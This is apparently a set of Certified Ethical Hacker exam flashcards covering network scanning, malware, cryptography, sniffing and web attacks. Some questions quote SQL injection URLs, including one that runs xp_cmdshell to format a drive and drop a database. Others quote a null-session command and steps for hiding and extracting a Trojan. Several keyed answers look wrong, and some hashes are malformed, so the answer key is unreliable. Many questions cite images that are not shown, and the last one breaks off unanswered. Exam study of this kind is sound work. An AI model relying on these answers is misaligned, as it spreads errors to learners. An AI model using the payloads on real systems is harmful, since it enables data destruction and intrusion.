CEH all

अब Quizwiz के साथ अपने होमवर्क और परीक्षाओं को एस करें!

What is the IV key size used in WPA2? a. 128 b. 48 c. 32 d. 16 e. 24

b. 48

Jake is a network administrator who needs to get reports from all the computer and network devices on his network. Jake wants to use SNMP but is afraid that won't be secure since passwords and messages are in clear text. How can Jake gather network information in a secure manner? a. He can use SecWMI b. He can use SNMPv3 c. Jake can use SNMPrev5 d. Jake can use SecSNMP

b. He can use SNMPv3

In Trojan terminology, what is required to create the executable file chess.exe as shown below? Picture: (Test 1 #41) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/713-041.jpg a. Mixer b. Wrapper c. Converter d. Zipper

b. Wrapper

SOAP services use which technology to format information? a. SATA b. XML c. PCI d. ISDN

b. XML

What is GINA? a. Gateway Interface Network Application b. Global Internet National Authority (G-USA) c. Graphical Identification and Authentication DLL d. GUI Installed Network Application CLASS

c. Graphical Identification and Authentication DLL

What is the following command used for? net use \targetipc$ "" /u:"" a. Enumeration of Cisco routers b. Grabbing the SAM c. This command is used to connect as a null session d. Grabbing the etc/passwd file e. Connecting to a Linux computer through Samba.

c. This command is used to connect as a null session

ARP poisoning is achieved in _____ steps a. 1 b. 4 c. 3 d. 2

d. 2

Which system consists of a publicly available set of databases that contain domain name registration contact information? a. CAPTCHA b. WHOIS c. IANA d. IETF

b. WHOIS

Exhibit: Picture: (Test 8 #50) Microsofe ODE DProve for ODBC Drive prove 00400e141 [Microsoft][ODBC SQL Server Driver][Undisclosed quotation mark before the character string",",/orderinclude_rsa.asp.line 4 You are conducting pen-test against a company's website using SQL Injection techniques. You enter "anuthing or 1=1-" in the username filed of an authentication form. This is the output returned from the server. What is the next step you should do? A. Identify the user context of the web application by running_ http://www.example.com/order/inclde_rsa_asp?pressReleaseID=5 ANDUSER_NAME() = 'dbo' B. Identify the database and table name by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 ANDascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERExtype='U'),1))) > 109 C. Format the C: drive and delete the database by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 ANDxp_cmdshell 'format c: /q /yes '; drop database myDB; D.Reboot the web server by running:http://www.example.com/order/include_rsa.asp?pressReleaseID=5 AND xp_cmdshell 'iisreset-reboot';

A. Identify the user context of the web application by running_ http://www.example.com/order/inclde_rsa_asp?pressReleaseID=5 ANDUSER_NAME() = 'dbo'

Which of the following command line switch would you use for OS detection in Nmap? a. -O b. -D c. -X d. -P

a. -O

Which of the following techniques does a vulnerability scanner use in order to detect a vulnerability on a target service? a. Analyzing service response b. Port scanning c. Injecting arbitrary data d. Banner grabbing

a. Analyzing service response

Which of the following LM hashes represents a password of less than 8 characters? a. B757BF5C0D87772FAAD3B435B51404EE b. E52CAC67419A9A224A3B108F3FA6CB6D c. 44EFCE164AB921CQAAD3B435B51404EE d. 0182BD0BD4444BF836077A718CCDF409 e. BA810DBA98995F1817306D272A9441BB f. CEC52EB9C8E3455DC2265B23734E0DAC

a. B757BF5C0D87772FAAD3B435B51404EE c. 44EFCE164AB921CQAAD3B435B51404EE

A large company intends to use Blackberry for corporate mobile phones and a security analyst is assigned to evaluate the possible threats. The analyst will use the Blackjacking attack method to demonstrate how an attacker could circumvent perimeter defenses and gain access to the corporate network. What tool should the analyst use to perform a Blackjacking attack? a. BBProxy b. BBCrack c. Paros Proxy d. Blooover

a. BBProxy

Which of the following is a strong post designed to stop a car? a. Bollard b. Fence c. Reinforced rebar d. Gate

a. Bollard

What is Cygwin? a. Cygwin is a free Unix subsystem that runs on top of Windows b. Cygwin is a free C++ compiler that runs on Windows c. Cygwin is a free Windows subsystem that runs on top of Linux d. Cygwin is a X Windows GUI subsytem that runs on top of Linux GNOME environment

a. Cygwin is a free Unix subsystem that runs on top of Windows

Bill is attempting a series of SQL queries in order to map out the tables within the database that he is trying to exploit. Choose the attack type from the choices given below. a. Database Fingerprinting b. Database Enumeration c. SQL Fingerprinting d. SQL Enumeration

a. Database Fingerprinting

This kind of password cracking method uses word lists in combination with numbers and special characters a. Hybrid b. Linear c. Brute Force d. Symmetric

a. Hybrid

A user on your Windows 2000 network has discovered that he can use L0phtcrack to sniff the SMB exchanges which carry user logons. The user is plugged into a hub with 23 other systems. However, he is unable to capture any logons though he knows that other users are logging in. What do you think is the most likely reason behind this? a. Kerberos is preventing it. b. Windows logons cannot be sniffed. c. There is a NIDS present on that segment. d. L0phtcrack only sniffs logons to web servers.

a. Kerberos is preventing it.

Which of the following programs is usually targeted at Microsoft Office products? a. Macro virus b. Multipart virus c. Stealth virus d. Polymorphic virus

a. Macro virus

In order to show improvement of security over time, what must be developed? a. Metrics b. Taxonomy of vulnerabilities c. Reports d. Testing tools

a. Metrics

Which type of intrusion detection system can monitor and alert on attacks, but cannot stop them? a. Passive b. Intuitive c. Reactive d. Detective

a. Passive

The precaution of prohibiting employees from bringing personal computing devices into a facility is what type of security control? a. Procedural b. Physical c. Technical d. Compliance

a. Procedural

What do you call a pre-computed hash? a. Rainbow tables b. Moon tables c. Apple tables d. Sun tables

a. Rainbow tables

Which of the following settings enables Nessus to detect when it is sending too many packets and the network pipe is approaching capacity? a. Reduce parallel connections on congestion b. Netstat WMI Scan c. Consider unscanned ports as closed d. Silent Dependencies

a. Reduce parallel connections on congestion

After gaining access to the password hashes used to protect access to a web based application, knowledge of which cryptographic algorithms would be useful to gain access to the application? a. SHA1 b. RSA c. AES d. Diffie-Helman

a. SHA1

Which is the right sequence of packets sent during the initial TCP three way handshake? a. SYN,SYN-ACK,ACK b. SYN,ACK,SYN-ACK c. SYN,URG,ACK d. FIN,FIN-ACK,ACK

a. SYN,SYN-ACK,ACK

What do you call a system where users need to remember only one username and password, and be authenticated for multiple services? a. Single Sign-on b. Unique Sign-on c. Digital Certificate d. Simple Sign-on

a. Single Sign-on

MX record priority increases as the number increases. (True/False.) a. True b. False

b. False

A remote user tries to login to a secure network using Telnet, but accidently types in an invalid user name or password. Which responses would NOT be preferred by an experienced Security Manager? (multiple answer) a. Login Attempt Failed b. Invalid Password c. Invalid Username d. Authentication Failure e. Access Denied

b. Invalid Password c. Invalid Username

Which of the following is one of the key features found in a worm but not seen in a virus? a. All of them cannot be detected by virus scanners. b. It is self replicating without need for user intervention. c. The payload is very small,usually below 800 bytes. d. It does not have the ability to propagate on its own.

b. It is self replicating without need for user intervention.

Which of the following tools will scan a network to perform vulnerability checks and compliance auditing? a. Metasploit b. Nessus c. NMAP d. BeEF

b. Nessus

Which of the following attacks takes best advantage of an existing authenticated connection? a. Spoofing b. Session Hijacking c. Password Guessing d. Password Sniffing

b. Session Hijacking

Joe Hacker is going wardriving. He is going to use PrismStumbler and wants it to go to a GPS mapping software application. What is the recommended and well-known GPS mapping package that would interface with PrismStumbler? Select the best answer. a. GPSMap b. Microsoft Mappoint c. GPSDrive d. WinPcap

c. GPSDrive

Fingerprinting VPN firewalls is possible with which of the following tools? a. Arp-scan b. Nikto c. Angry IP d. Ike-scan

d. Ike-scan

What are the three types of authentication? a. Something you: show,have,prove b. Something you: show,prove,are c. Something you: know,remember,prove d. Something you: have,know,are

d. Something you: have,know,are

When Jason moves a file via NFS over the company's network, you want to grab a copy of it by sniffing. Which of the following tool accomplishes this? a. macof b. webspy c. nfscopy d. filesnarf

d. filesnarf

Which Steganography technique uses Whitespace to hide secret messages? a. magnet b. cat c. beetle d. snow

d. snow

One of your team members has asked you to analyze the following SOA record. What is the TTL? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400. a. 2400 b. 4800 c. 3600 d. 200303028 e. 604800 f. 60

a. 2400

Jane has just accessed her preferred e-commerce web site and she has seen an item she would like to buy. Jane considers the price a bit too steep; she looks at the page source code and decides to save the page locally to modify some of the page variables. In the context of web application security, what do you think Jane has changed? a. A 'hidden' form field value b. A page cannot be changed locally; it can only be served by a web server c. A 'hidden' price value d. An integer variable

a. A 'hidden' form field value

In the context of Windows Security, what is a 'null' user? a. A pseudo account that has no username and password b. A user that has no skills c. An account that has been suspended by the admin d. A pseudo account that was created for security administration purpose

a. A pseudo account that has no username and password

What is a NULL scan? a. A scan in which all flags are turned off b. A scan with a illegal packet size c. A scan in which all flags are on d. A scan in which certain flags are off e. A scan in which the packet size is set to zero

a. A scan in which all flags are turned off

____________ will let you assume a users identity at a dynamically generated web page or site. a. Cross site scripting b. Injection attack c. Winzapper d. SQL attack e. The shell attack

a. Cross site scripting

An Evil Cracker is attempting to penetrate your private network security. To do this, he must not be seen by your IDS, as it may take action to stop him. What tool might he use to bypass the IDS? Select the best answer. a. Fragrouter b. Manhunt c. Firewalk d. Fragids

a. Fragrouter

SNMP is a protocol used to query hosts, servers, and devices about performance or health status data. This protocol has long been used by hackers to gather great amount of information about remote hosts. Which of the following features makes this possible? (Choose two) a. It uses community string that is transmitted in clear text. b. It used TCP as the underlying protocol. c. It is used by all network devices on the market. d. It is susceptible to sniffing.

a. It uses community string that is transmitted in clear text. c. It is used by all network devices on the market.

There are two types of honeypots- high and low interaction. Which of these describes a low interaction honeypot? Select the best answers. a. Tend to be used for production b. Tend to be used for research c. More likely to be penetrated d. More detectable e. Emulators of vulnerable programs f. Easier to deploy and maintain

a. Tend to be used for production d. More detectable e. Emulators of vulnerable programs f. Easier to deploy and maintain

What is the advantage in encrypting the communication between the agent and the monitor in an Intrusion Detection System? a. The monitor will know if counterfeit messages are being generated because they will not be encrypted b. Encryption of agent communications will conceal the presence of the agents c. An intruder could intercept and delete data or alerts and the intrusion can go undetected d. Alerts are sent to the monitor when a potential intrusion is detected

a. The monitor will know if counterfeit messages are being generated because they will not be encrypted

How can you determine if an LM hash you extracted contains a password that is less than 8 characters long? a. The right most portion of the hash is always the same b. A portion of the hash will be all 0's c. The left most portion of the hash is always the same d. The hash always starts with AB923D e. There is no way to tell because a hash cannot be reversed

a. The right most portion of the hash is always the same

Exhibit: Picture: (Test 7 #17) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-620.gif Study the following log extract and identify the attack. a. Unicode Directory Traversal Attack b. Multiple Domain Traversal Attack c. Hexcode Attack d. Cross Site Scripting

a. Unicode Directory Traversal Attack

File extensions provide information regarding the underlying server technology. Attackers can use this information to search vulnerabilities and launch attacks. How would you disable file extensions in Apache servers? a. Use mod_negotiation b. Use Lib_exchanges c. Use disable-eXchange d. Use Stop_Files

a. Use mod_negotiation

What does FIN in TCP flag define? a. Used to close a TCP connection b. Used to acknowledge receipt of a previous packet or transmission c. Used to indicate the beginning of a TCP connection d. Used to abort a TCP connection abruptly

a. Used to close a TCP connection

Which of the following type of scanning utilizes automated process of proactively identifying vulnerabilities of the computing systems present on a network? a. Vulnerability Scanning b. Port Scanning c. External Scanning d. Single Scanning

a. Vulnerability Scanning

Which of the following snort rules look for FTP root login attempts? a. alert tcp any any -> any any 21 (content:"user root";) b. alert tcp -> any port 21 (message:"user root";) c. alert ftp -> ftp (content:"user password root";) d. alert tcp -> any port 21 (msg:"user root";)

a. alert tcp any any -> any any 21 (content:"user root";)

You have hidden a Trojan file virus.exe inside another file readme.txt using NTFS streaming. Which command would you execute to extract the Trojan to a standalone file? a. c:\> cat readme.txt:virus.exe > virus.exe b. c:\> more readme.txt | virus.exe > virus.exe c. c:\> list redme.txt$virus.exe > virus.exe d. c:\> type readme.txt:virus.exe > virus.exe

a. c:\> cat readme.txt:virus.exe > virus.exe

E-mail scams and mail fraud are regulated by which of the following? a. 18 U.S.C. par. 2510 Wire and Electronic Communications Interception and Interception of Oral Communication b. 18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers c. 18 U.S.C. par. 1029 Fraud and Related activity in connection with Access Devices d. 18 U.S.C. par. 1362 Communication Lines, Stations, or Systems

b. 18 U.S.C. par. 1030 Fraud and Related activity in connection with Computers

If an attacker's computer sends an IPID of 31400 to a zombie (Idle Scanning) computer on an open port, what will be the response? a. 31400 b. 31402 c. 31401 d. The zombie will not send a response

b. 31402

NetBIOS over TCP/IP allows files and/or printers to be shared over the network. You are trying to intercept the traffic from a victim machine to a corporate network printer. You are attempting to hijack the printer network connection from your laptop by sniffing the wire. Which port does SMB over TCP/IP use? a. 443 b. 445 c. 139 d. 179

b. 445

Exhibit Picture: (Test 9 #5) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-818.gif Study the log given in the exhibit, Precautionary measures to prevent this attack would include writing firewall rules. Of these firewall rules, which among the following would be appropriate? a. Disallow UDP 53 in from outside to DNS server b. Allow UDP 53 in from DNS server to outside c. Disallow TCP 53 in form secondaries or ISP server to DNS server d. Block all UDP traffic

b. Allow UDP 53 in from DNS server to outside

While reviewing the result of scanning run against a target network you come across the following: Picture: (Test 6 #76) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-577.gif Which among the following can be used to get this output? a. A sniffer b. An SNMP walk c. A Bo2k system query. d. nmap protocol scan

b. An SNMP walk

Which of the following is most effective against passwords? Select the Answer: a. Dictionary Attack b. BruteForce attack c. Targeted Attack d. Manual password Attack

b. BruteForce attack

A computer science student needs to fill some information into a secured Adobe PDF job application that was received from a prospective employer. Instead of requesting a new document that allowed the forms to be completed, the student decides to write a script that pulls passwords from a list of commonly used passwords to try against the secured PDF until the correct password is found or the list is exhausted. Which cryptography attack is the student attempting? a. Brute-force attack b. Dictionary attack c. Session hijacking d. Man-in-the-middle attack

b. Dictionary attack

What is Form Scalpel used for? a. Analysis of Access Database Forms b. Dissecting HTML Forms c. Troubleshooting Netscape Navigator d. Dissecting SQL Forms e. Quatro Pro Analysis Tool

b. Dissecting HTML Forms

Password cracking programs reverse the hashing process to recover passwords.(True/False ). a. True b. False

b. False

Which solution can be used to emulate computer services, such as mail and ftp, and to capture information related to logins or actions? a. Core server b. Honeypot c. Layer 4 switch d. Firewall

b. Honeypot

Melissa is a virus that attacks Microsoft Windows platforms. To which category does this virus belong? a. System b. Macro c. Boot Sector infector d. Polymorphic

b. Macro

What type of attack is shown in the following diagram? Picture: (Test 1 #16) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-008.gif a. Session Hijacking Attack b. Man-in-the-Middle (MiTM) Attack c. Identity Stealing Attack d. SSL Spoofing Attack

b. Man-in-the-Middle (MiTM) Attack

Which of the following is an example of IP spoofing? a. Cross-site scripting b. Man-in-the-middle c. ARP poisoning d. SQL injections

b. Man-in-the-middle

This method is used to determine the Operating system and version running on a remote target system. What is it called? a. Manual Target System b. OS Fingerprinting c. Service Degradation d. Identification Scanning

b. OS Fingerprinting

What are the default passwords used by SNMP? (Choose two.) a. Blank b. Public c. Private d. Administrator e. SA f. Password

b. Public c. Private

For messages sent through an insecure channel, a properly implemented digital signature gives the receiver reason to believe the message was sent by the claimed sender. While using a digital signature, the message digest is encrypted with which key? a. Sender's public key b. Sender's private key c. Receiver's private key d. Receiver's public key

b. Sender's private key

Jayden is a network administrator for her company. Jayden wants to prevent MAC spoofing on all the Cisco switches in the network. How can she accomplish this? a. Jayden can use the command: no ip spoofing b. She can use the command: ipdhcp snooping binding c. Jayden can use the command: ip binding set d. She should use the command: no dhcp spoofing

b. She can use the command: ipdhcp snooping binding

Which type of scan does NOT open a full TCP connection? a. FIN Scan b. Stealth Scan c. XMAS Scan d. Null Scan

b. Stealth Scan

On a default installation of Microsoft IIS web server, under which privilege does the web server software execute? a. Guest b. System c. Everyone d. Administrator

b. System

Which of the following conditions must be given to allow a tester to exploit a Cross-Site Request Forgery (CSRF) vulnerable web application? a. The victim user must open the malicious link with an Internet Explorer prior to version 8. b. The web application should not use random tokens. c. The victim user must open the malicious link with a Firefox prior to version 3. d. The session cookies generated by the application do not have the HttpOnly flag set.

b. The web application should not use random tokens.

What is the tool Firewalk used for? a. To test the webserver configuration b. To determine what rules are in place for a firewall c. Firewalk is a firewall auto configuration tool d. To test a firewall for proper operation e. To test the IDS for proper operation

b. To determine what rules are in place for a firewall

Why would an attacker want to perform a scan on port 137? a. To check for file and print sharing on Windows systems b. To discover information about a target host using NBTSTAT c. To discover proxy servers on a network d. To disrupt the NetBIOS SMB service on the target host

b. To discover information about a target host using NBTSTAT

A penetration tester is hired to do a risk assessment of a company's DMZ. The rules of engagement states that the penetration test be done from an external IP address with no prior knowledge of the internal IT systems. What kind of test is being performed? a. white box b. black box c. grey box d. red box

b. black box

How many bits encryption does SHA-1 use? a. 64 bits b. 128 bits c. 160 bits d. 256 bits

c. 160 bits

While performing a ping sweep of a subnet you receive an ICMP reply of Code 3/Type 13 for all the pings sent out. What is the most likely cause behind this response? a. The host does not respond to ICMP packets. b. The firewall is dropping the packets. c. A router is blocking ICMP. d. An in-line IDS is dropping the packets.

c. A router is blocking ICMP.

Picture: (Test 9 #48) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-846.gif You perform the above traceroute and notice that hops 19 and 20 both show the same IP address. This probably indicates what? a. A Honeypot b. A host based IDS c. A stateful inspection firewall d. An application proxying firewall

c. A stateful inspection firewall

If you send a SYN to an open port, what is the correct response?(Choose all correct answers.) a. FIN b. PSH c. ACK d. SYN

c. ACK d. SYN

A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) then it was intended to hold. What is the most common cause of buffer overflow in software today? a. High bandwidth and large number of users. b. Usage of non standard programming languages. c. Bad quality assurance on software produced. d. Bad permissions on files.

c. Bad quality assurance on software produced.

What are two types of ICMP code used when using the ping command? a. It uses types 13 and 14. b. The ping command does not use ICMP but uses UDP. c. It uses types 0 and 8. d. It uses types 15 and 17.

c. It uses types 0 and 8.

Which of the following parameters enables NMAP's operating system detection feature? a. NMAP -oS b. NMAP -sV c. NMAP -O d. NMAP -sR

c. NMAP -O

Which of the following tools would be the best choice for achieving compliance with PCI Requirement 11? a. Sub7 b. Clamwin c. Nessus d. Truecrypt

c. Nessus

Which type of security document is written with specific step-by-step details? a. Process b. Policy c. Procedure d. Paradigm

c. Procedure

What is the proper response for a X-MAS scan if the port is closed? a. FIN b. PSH c. RST d. SYN e. No response f. ACK

c. RST

Global deployment of RFC 2827 would help mitigate what classification of attack? a. Prot Scan attack b. Denial of service attack c. Spoofing attack d. Sniffing attack e. Reconnaissance attack

c. Spoofing attack

Lori was performing an audit of her company's internal Sharepoint pages when she came across the following codE. What is the purpose of this code? Picture: (Test 1 #84) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-100.gif a. This code snippet will send a message to a server at 192.154.124.55 whenever the "escape" key is pressed. b. This JavaScript code will use a Web Bug to send information back to another server. c. This code will log all keystrokes. d. This bit of JavaScript code will place a specific image on every page of the RSS feed.

c. This code will log all keystrokes.

Which tool can be used to silently copy files from USB devices? a. USB Snoopy b. USB Grabber c. USB Dumper d. USB Sniffer

c. USB Dumper

Steven the hacker realizes that the network administrator of XYZ is using syskey to protect organization resources in the Windows 2000 Server. Syskey independently encrypts the hashes so that physical access to the server, tapes, or ERDs is only first step to cracking the passwords. Steven must break through the encryption used by syskey before he can attempt to brute force dictionary attacks on the hashes. Steven runs a program called "SysCracker" targeting the Windows 2000 Server machine in attempting to crack the hash used by Syskey. He needs to configure the encryption level before he can launch attach. How many bits does Syskey use for encryption? a. 64 bit b. 40 bit c. 256 bit d. 128 bit

d. 128 bit

Susan has attached to her company's network. She has managed to synchronize her boss's sessions with that of the file server. She then intercepted his traffic destined for the server, changed it the way she wanted to and then placed it on the server in his home directory. What kind of attack is Susan carrying on? a. A denial of service attack b. A sniffing attack c. A spoofing attack d. A man in the middle attack

d. A man in the middle attack

Pentest results indicate that voice over IP traffic is traversing a network. Which of the following tools will decode a packet capture and extract the voice conversations? a. John the Ripper b. Nikto c. Hping d. Cain

d. Cain

Which of the following ensures that updates to policies, procedures, and configurations are made in a controlled and documented fashion? a. Regulatory compliance b. Peer review c. Penetration testing d. Change management

d. Change management

An attacker sniffs encrypted traffic from the network and is subsequently able to decrypt it. The attacker can now use which cryptanalytic technique to attempt to discover the encryption key? a. Birthday attack b. Plaintext attack c. Meet in the middle attack d. Chosen ciphertext attack

d. Chosen ciphertext attack

Bob is going to perform an active session hijack against Brownies Inc. He has found a target that allows session oriented connections (Telnet) and performs the sequence prediction on the target operating system. He manages to find an active session due to the high level of traffic on the network. What is Bob supposed to do next? a. Reverse sequence prediction b. Take over the session c. Take one of the parties offline d. Guess the sequence numbers

d. Guess the sequence numbers

A botnet can be managed through which of the following? a. E-Mail b. Linkedin and Facebook c. A vulnerable FTP server d. IRC

d. IRC

Peter is a Linux network admin. As a knowledgeable security consultant, he turns to you to look for help on a firewall. He wants to use Linux as his firewall and use the latest freely available version that is offered. What do you recommend? Select the best answer. a. Ipchains b. Checkpoint FW for Linux c. Ipfwadm d. Iptables

d. Iptables

A circuit level gateway works at which of the following layers of the OSI Model? a. Layer 2 - Data link b. Layer 3 - Internet protocol c. Layer 5 - Application d. Layer 4 - TCP

d. Layer 4 - TCP

Which of the following Trojans would be considered 'Botnet Command Control Center'? a. Matten Kit b. YouKill DOOM c. Damen Rock d. Poison Ivy

d. Poison Ivy

In which step Steganography fits in CEH System Hacking Cycle (SHC) a. Step 6: Cover your tracks b. Step 1: Enumerate users c. Step 3: Escalate privileges d. Step 5: Hide files e. Step 2: Crack the password f. Step 4: Execute applications

d. Step 5: Hide files

John is using tokens for the purpose of strong authentication. He is not confident that his security is considerably strong. In the context of Session hijacking why would you consider this as a false sense of security? a. A token is not considered strong authentication. b. The token based security cannot be easily defeated. c. Token security is not widely used in the industry. d. The connection can be taken over after authentication.

d. The connection can be taken over after authentication.

What is the purpose of conducting security assessments on network resources? a. Documentation b. Implementation c. Management d. Validation

d. Validation

Which Open Web Application Security Project (OWASP) implements a web application full of known vulnerabilities? a. WebBugs b. VULN_HTML c. WebScarab d. WebGoat

d. WebGoat

An engineer is learning to write exploits in C++ and is using the exploit tool Backtrack. The engineer wants to compile the newest C++ exploit and name it calc.exe. Which command would the engineer use to accomplish this? a. g++ --compile -i hackersExploit.cpp -o calc.exe b. g++ -i hackersExploit.pl -o calc.exe c. g++ hackersExploit.py -o calc.exe d. g++ hackersExploit.cpp -o calc.exe

d. g++ hackersExploit.cpp -o calc.exe

What is the command used to create a binary log file using tcpdump? a. tcpdump -r log b. tcpdump -vde logtcpdump -vde ? log c. tcpdump -l /var/log/ d. tcpdump -w ./log

d. tcpdump -w ./log

Which of the following ICMP message types are used for destinations unreachables? a. 13 b. 0 c. 11 d. 17 e. 3

e. 3

What type of Virus is shown here? Picture: (Test 2 #29) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-134.gif a. Metamorphic Virus b. Sparse Infector Virus c. Macro Virus d. Boot Sector Virus e. Cavity Virus

e. Cavity Virus

What is the BEST alternative if you discover that a rootkit has been installed on one of your computers? a. Perform a trap and trace b. Copy the system files from a known good system c. Delete the files and try to determine the source d. Reload from a previous backup e. Reload from known good media

e. Reload from known good media

One of your team members has asked you to analyze the following SOA record. What is the version? Rutgers.edu.SOA NS1.Rutgers.edu ipad.college.edu (200302028 3600 3600 604800 2400. a. 2400 b. 4800 c. 60 d. 604800 e. 3600 f. 200303028

f. 200303028

What port number is used by LDAP protocol? a. 389 b. 110 c. 464 d. 445

a. 389

Which of the following wireless technologies can be detected by NetStumbler? (Select all that apply) a. 802.11g b. 802.11b c. 802.11 d. 802.11e e. 802.11a

a. 802.11g b. 802.11b e. 802.11a

You are programming a buffer overflow exploit and you want to create a NOP sled of 200 bytes in the program exploit.c Picture: (Test 2 #68) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-172.gif What is the hexadecimal value of NOP instruction? a. 0x70 b. 0x90 c. 0x80 d. 0x60

b. 0x90

While checking the settings on the internet browser, a technician finds that the proxy server settings have been checked and a computer is trying to use itself as a proxy server. What specific octet within the subnet does the technician see? a. 192.168.168.168 b. 127.0.0.1 c. 192.168.1.1 d. 10.10.10.10

b. 127.0.0.1

Which of the following guidelines or standards is associated with the credit card industry? a. Control Objectives for Information and Related Technology (COBIT) b. Payment Card Industry Data Security Standards (PCI DSS) c. Sarbanes-Oxley Act (SOX) d. Health Insurance Portability and Accountability Act (HIPAA)

b. Payment Card Industry Data Security Standards (PCI DSS)

Which tool would be used to collect wireless packet data? a. Nessus b. John the Ripper c. Netcat d. NetStumbler

d. NetStumbler

A pentester gains acess to a Windows application server and needs to determine the settings of the built-in Windows firewall. Which command would be used? a. Net firewall show config b. WMIC firewall show config c. Ipconfig firewall show config d. Netsh firewall show config

d. Netsh firewall show config

Ethereal works best on ____________. a. LAN's b. Switched networks c. Linux platforms d. Networks using hubs e. Windows platforms

d. Networks using hubs

In the software security development life cycle process, threat modeling occurs in which phase? a. Design b. Requirements c. Implementation d. Verification

a. Design

Sniffing is considered an active attack. a. False b. True

a. False

Which cipher encrypts the plain text digit (bit or byte) one by one? a. Stream cipher b. Classical cipher c. Modern cipher d. Block cipher

a. Stream cipher

Harold is the senior security analyst for a small state agency in New York. He has no other security professionals that work under him, so he has to do all the security-related tasks for the agency. Coming from a computer hardware background, Harold does not have a lot of experience with security methodologies and technologies, but he was the only one who applied for the position. Harold is currently trying to run a Sniffer on the agency's network to get an idea of what kind of traffic is being passed around, but the program he is using does not seem to be capturing anything. He pours through the Sniffer's manual, but cannot find anything that directly relates to his problem. Harold decides to ask the network administrator if he has any thoughts on the problem. Harold is told that the Sniffer was not working because the agency's network is a switched network, which cannot be sniffed by some programs without some tweaking. What technique could Harold use to sniff his agency's switched network? a. Launch smurf attack against the switch b. ARP spoof the default gateway c. Conduct MiTM against the switch d. Flood the switch with ICMP packets

b. ARP spoof the default gateway

A bank stores and processes sensitive privacy information related to home loans. However, auditing has never been enabled on the system. What is the first step that the bank should take before enabling the audit feature? a. Perform a vulnerability scan of the system. b. Allocate funds for staffing of audit log review. c. Determine the impact of enabling the audit feature. d. Perform a cost/benefit analysis of the audit feature.

c. Determine the impact of enabling the audit feature.

A security administrator notices that the log file of the company`s webserver contains suspicious entries: Picture: (Test 4 #60) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-251.gif Based on source code analysis, the analyst concludes that the login.php script is vulnerable to a. directory traversal. b. command injection. c. SQL injection. d. LDAP injection.

c. SQL injection.

What are the main drawbacks for anti-virus software? a. AV software can detect viruses but can take no action. b. AV software is signature driven so new exploits are not detected. c. AV software is difficult to keep up to the current revisions. d. It's relatively easy for an attacker to change the anatomy of an attack to bypass AV systems e. AV software is very machine (hardware) dependent. f. AV software isn't available on all major operating systems platforms.

b. AV software is signature driven so new exploits are not detected.

What type of OS fingerprinting technique sends specially crafted packets to the remote OS and analyzes the received response? a. Reflective b. Active c. Distributive d. Passive

b. Active

What is a sniffing performed on a switched network called? a. Spoofed sniffing b. Active sniffing c. Passive sniffing d. Direct sniffing

b. Active sniffing

This tool is widely used for ARP Poisoning attack. Name the tool. Picture: (Test 1 #92) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-089.gif a. Poison Ivy b. Cain and Able c. Beat Infector d. Webarp Infector

b. Cain and Able

A hacker is attempting to see which ports have been left open on a network. Which NMAP switch would the hacker use? a. -sU b. -sP c. -sO d. -sS

c. -sO

Which of the following commands runs snort in packet logger mode? a. ./snort -dev -p ./log b. ./snort -dev -h ./log c. ./snort -dev -l ./log d. ./snort -dev -o ./log

c. ./snort -dev -l ./log

When creating a security program, which approach would be used if senior management is supporting and enforcing the security policy? a. A senior creation approach b. A bottom-up approach c. A top-down approach d. An IT assurance approach

c. A top-down approach

Which of the following is a hashing algorithm? a. ROT13 b. DES c. MD5 d. PGP

c. MD5

Bob has been hired to do a web application security test. Bob notices that the site is dynamic and must make use of a back end database. Bob wants to see if SQL Injection would be possible. What is the first character that Bob should use to attempt breaking valid SQL request? a. Double Quote b. Exclamation Mark c. Single Quote d. Semi Colon

c. Single Quote

One of the most common and the best way of cracking RSA encryption is to begin to derive the two prime numbers, which are used in the RSA PKI mathematical process. If the two numbers p and q are discovered through a _____________ process, then the private key can be derived. a. Hashing b. Prime Detection c. Brute-forcing d. Factorization

d. Factorization

This TCP flag instructs the sending system to transmit all buffered data immediately. a. RST b. PSH c. SYN d. FIN e. URG

b. PSH

What flags are set in a X-MAS scan?(Choose all that apply.) a. SYN b. PSH c. FIN d. URG e. RST f. ACK

b. PSH c. FIN d. URG

Exhibit: Picture: (Test 7 #91) http://blendedlearning.infotecpro.com/file.php/5/2014_CEH/414-691.gif You have captured some packets in Ethereal. You want to view only packets sent from 10.0.0.22. What filter will you apply? A.ip = 10.0.0.22 B.ip.src == 10.0.0.22 C.ip.equals 10.0.0.22 D.ip.address = 10.0.0.22

B.ip.src == 10.0.0.22

TCP SYN Flood attack uses the three-way handshake mechanism. 1. An attacker at system A sends a SYN packet to victim at system B. 2. System B sends a SYN/ACK packet to victim A. 3. As a normal three-way handshake mechanism system A should send an ACK packet to system B, however, system A does not send an ACK packet to system B. In this case client B is waiting for an ACK packet from client A. This status of client B is called _________________ a. "half open" b. "half-closed" c. "xmas-open" d. "full-open"

a. "half open"

You are a Administrator of Windows server. You want to find the port number for POP3. What file would you find the information in and where? Select the best answer. Choose one answer. a. %windir%\system32\drivers\etc\services b. %windir%\etc\services c. system32\drivers\etc\services d. %windir%/system32/drivers/etc/services e. /etc/services

a. %windir%\system32\drivers\etc\services

Which command line switch would be used in NMAP to perform operating system detection? a. -O b. -sP c. -OS d. -sO

a. -O

From the two screenshots below, which of the following is occurring? a. 10.0.0.253 is performing an IP scan against 10.0.0.0/24,10.0.0.252 is performing a port scan against 10.0.0.2. b. 10.0.0.252 is performing an IP scan against 10.0.0.2,10.0.0.252 is performing a port scan against 10.0.0.2. c. 10.0.0.253 is performing an IP scan against 10.0.0.2,10.0.0.252 is performing a port scan against 10.0.0.2. d. 10.0.0.2 is performing an IP scan against 10.0.0.0/24,10.0.0.252 is performing a port scan against 10.0.0.2.

